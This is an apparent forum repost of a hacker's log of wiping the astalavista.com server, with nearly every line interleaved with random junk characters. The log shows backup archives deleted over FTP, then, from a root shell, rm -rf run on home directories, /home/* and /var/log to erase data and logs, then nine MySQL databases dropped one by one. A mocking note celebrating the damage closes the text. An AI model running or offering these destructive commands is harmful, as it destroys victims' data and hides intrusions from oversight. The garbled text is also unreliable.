Using binary mode to transfer files.1 N: w1 T3 p1 _6 u
ftp> ls -la5 C7 Q' r0 i: X
227 Entering Passive Mode (212,254,194,163,2,188)
* L$ b( N: r& q150 Opening BINARY mode data connection for ‘file list’.
7 ^1 ^6 e0 Y, F9 U8 M! d2 Tdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
+ F6 {1 l' F: N3 z, \226 Transfer complete.9 r" v" X2 c) V4 {7 V* a& b; I
ftp> cd astalavista.com
N4 r: G4 k. r8 j; B- D$ ^5 Z250 CWD command successful. ]+ C3 V2 c9 b3 c
ftp> ls -la) |7 [* `) F* X6 K3 u ~2 N
227 Entering Passive Mode (212,254,194,163,2,189)7 v- y* S9 ~) ^% x$ G9 l+ t7 F
150 Opening BINARY mode data connection for ‘file list’.
+ X4 f* @: U5 U& ^ c/ v' b-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar7 R' A$ c+ G3 _. h
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 F: r6 t/ q7 ]( R3 q-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
2 t, M! U4 @7 _+ Q-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar/ s& ~6 y3 i- p$ |* a
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
% U7 Z" A Y% N- S[snip]# d# k3 X3 Z& K& w Q9 t5 \
226 Transfer complete.% Z2 l: D" Q0 ]+ f
ftp> mdelete *
7 i r3 J) H5 C# `5 j1 b) _. P Qftp> ls -la
. Y; Q& R7 _5 v8 B% |) y227 Entering Passive Mode (212,254,194,163,2,193)- c9 t; C" u! Q7 o: P$ w" M& j& p
150 Opening BINARY mode data connection for ‘file list’.
% c3 V; g% f6 D0 M) q226 Transfer complete.4 u' k n6 J T7 X/ m% M4 m, S
ftp>2 q- z% Y6 ?0 m; o; L+ X
' i; u& ^+ N% _ l4 P1 d, A
sh-3.2# cd /home
: X9 G6 A% v* z: [: hsh-3.2# ls -la# z+ A( [7 h+ A# y7 ]% h5 s
total 120$ I* R: c0 c8 R% v. q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
# G6 J6 i* d, c- ^$ T1 p9 kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
$ }) G2 D' F1 u$ E+ h# odrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
3 _/ Z5 _$ T4 P- B2 |( k-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
/ [; I+ O( k1 y$ h1 D! i7 |+ T-rw——- 1 root root 8192 Jun 3 02:45 aquota.user: r" r/ D( \9 x9 f4 o6 _
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
# v5 W& ~$ v$ g, zdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
: i& {3 y) y# [, hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
5 m% ~ [ N. p& u1 Vdrwx–x–x 10 com com 4096 Apr 28 12:40 com
/ h/ j o0 d8 v) ^: N9 ?1 [drwxr-xr-x 2 root root 4096 May 17 2007 ftp
; F2 g6 ^% }1 L* R3 a8 h; zdrwx—— 3 jon jon 4096 Sep 21 2007 jon
- D2 Y! R5 c( L5 Sdrwx—— 2 root root 16384 Sep 11 2007 lost+found
5 y, i, g4 U% b5 M2 A7 z! @drwxr-xr-x 2 root root 4096 Sep 14 2007 my
8 D1 B3 Q, q& d6 _+ Bdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
* r' V( t, k5 b& n$ Ddrwx—— 2 jon jon 4096 Sep 15 2007 test2 h1 d F# n3 X- M. B, e
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
% ~7 v: H3 y9 Q; K3 r( X' K6 J! x: q, S6 D
sh-3.2# rm -rf backup/
! B0 d' [) C1 vsh-3.2# rm -rf backup.14161/
! u9 [& p6 W' V, J; [2 a; fsh-3.2# rm -rf ftp/
" ~; [. U+ L7 d! N/ w, Z/ m/ P% q) xsh-3.2# rm -rf jon/
* t- L. |( f, L I$ H5 E1 f( lsh-3.2# rm -rf my/3 @2 E) \: y" p2 O/ k/ h$ U
sh-3.2# rm -rf mysqldata/
4 w# _3 e/ X# _0 F: y+ `7 msh-3.2# rm -rf test/6 m. \9 D% h2 W/ L. a4 ?8 |( j+ s
sh-3.2# rm -rf tmp/
: E; t1 N: ]6 y) e( Z, e( [sh-3.2# cd ~) h% [, x+ f6 X. {( H& `. u
sh-3.2# rm -rf *
1 h- Y3 M. H( {; Psh-3.2# rm -rf /var/log/
6 E% L6 H3 I5 ]' U n. k( \/ h3 erm: cannot remove directory `/var/log//proftpd’: Directory not empty
# k% z$ X( r9 X! X: Psh-3.2# rm -rf /home/*
- |9 q7 {' r1 o6 vsh-3.2# mysql& v- j9 L f0 V- F$ o/ L1 B
Welcome to the MySQL monitor. Commands end with ; or \g./ f$ {! j9 c+ \7 T3 w3 \+ D) K
Your MySQL connection id is 4071569 E, H7 B; U* ]8 F+ ^, f
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
z( K0 @& Y o$ }0 ]+ ]0 J* Z0 m1 O4 p+ t
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ z1 y6 m3 o* Z o3 `, h3 q2 ?! I/ c
% p3 C; i l$ l5 gmysql> show databases;$ D& g7 F. M& A& h" f* |/ b
+———————–+* d M1 f2 ?9 J
| Database |& `6 g& P% J* R" t5 O/ {# W. r
+———————–+" f: Q* I* @$ \
| information_schema |
; B8 |0 j0 e7 s% {; t| astanet_ads |
% N9 z. O S2 S2 ]| astanet_mailing_lists |6 T4 j& D7 \4 s. q3 ?+ |
| astanet_mediawiki |& ]9 p5 }1 w& I$ b& ^
| astanet_membersystem |
. r( G3 _4 L- I' m/ O; S, a| com_contrexx |
U; j+ n1 }% w/ E' y* A9 v| com_contrexx2 |
+ J! Q s: H, _- C; \; H9 ]| com_contrexx2_live |
4 h; X C/ N' N+ R2 L5 P# }" E/ J| da_roundcube |; n/ p3 a/ l O$ b" K
| dolphin |0 v! S7 [7 `6 E" X
| ideapool |" Y/ Z/ J/ A- h
| mysql |
$ S, O+ B/ i4 d- O4 _+ P| test |6 N" B/ e+ o6 l6 ?5 x
| yourmaster |
, J/ M' ^5 V+ u, k d+———————–+4 j1 `. E$ C/ h! i
14 rows in set (0.03 sec), I. E( \, F/ D* h4 \2 }( x' z
0 ?4 a5 c5 y9 s2 R0 |: U; y4 ~
mysql> drop database astanet_membersystem;. y# `1 m+ Y- C j. P1 Q
droQuery OK, 46 rows affected (0.81 sec)4 b$ L' v+ I# a7 V: j# k5 s' D0 |
$ {; z! V7 z% `3 w4 m
mysql> drop database com_contrexx;
9 z. d/ Y+ G- `Query OK, 211 rows affected (2.72 sec)
/ v* L9 b# N+ T; z7 m6 V4 ]
, r% l$ a. L& h; N/ kmysql> drop database com_contrexx2;* y2 t$ ?. p1 g, I$ D) L6 G+ _
Query OK, 237 rows affected (2.23 sec)
) u- h8 h5 A y% N, b* V; U# K7 e, B. U! x
mysql> drop database com_contrexx2_live; b! ?1 c* r0 m, M- o
Query OK, 227 rows affected (7.63 sec)
0 O. d: }9 u+ S& ~& s; Z
+ t: X6 l0 `1 A! _* Z0 F$ r' amysql> drop database ideapool;
% _' A* v( o' f aQuery OK, 69 rows affected (0.19 sec)
( a% V2 L" a4 f5 y6 u2 a
; z# s) v0 T3 y" n; I# Y9 k( Pmysql> drop database yourmaster;
6 H* u: ^& h9 p* A; U hQuery OK, 158 rows affected (0.55 sec)
" F6 Y$ T; `' h4 z2 {# b) R6 b& a
mysql> drop database astanet_ads;
- h# B! |; ?$ IQuery OK, 9 rows affected (0.11 sec)6 H$ X5 ?) ?: o3 a X f
. }( o r/ r6 p* M% Bmysql> drop database astanet_mailing_lists;
' L) f! t& c" b: _Query OK, 24 rows affected (1.47 sec)" ~( X6 `& d: {# P. b: m
. t0 F2 c& M2 K, K2 b) gmysql> drop database astanet_mediawiki;
3 H) e, [6 V4 P \Query OK, 31 rows affected (0.51 sec)$ Y- ?& u5 {# E8 ~0 k e
+ ]5 u, x; U" G) R2 }
mysql> show databases;
: i Y9 ?4 p5 d+——————–+" K! K" @$ Y/ O% N. M6 L& }! ^
| Database |. J/ ?. W& p# r
+——————–+
+ D- o# y' O) j$ `3 C- {$ i. U$ [| information_schema |3 ~, r+ L' p! o# Q; G ^- b
| da_roundcube |/ a0 @7 N3 e0 V. y
| dolphin |
; ~5 A! @( i) d: P2 V| mysql |, X6 v; c x& q% b
| test |. e$ {& H! T/ {; N
+——————–+
, B. W4 D$ k* I& }3 b& U5 rows in set (0.00 sec)
3 r4 Z' O3 {* M/ p0 _) X3 }: A
6 I- I, N$ l6 d% {0 R3 i4 m. \, uWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
6 A( S$ T. S" l/ ?( |. ^their naming (conventions) but we’re sure Arnold himself wouldn’t be in the7 i9 m7 h2 v; G5 n( l: I+ J; @: W
wrong to say this pack of morons *wont be back*.
3 b6 `) l a" `6 B |
发表于 2012-11-6 21:07:34
收藏
支持
反对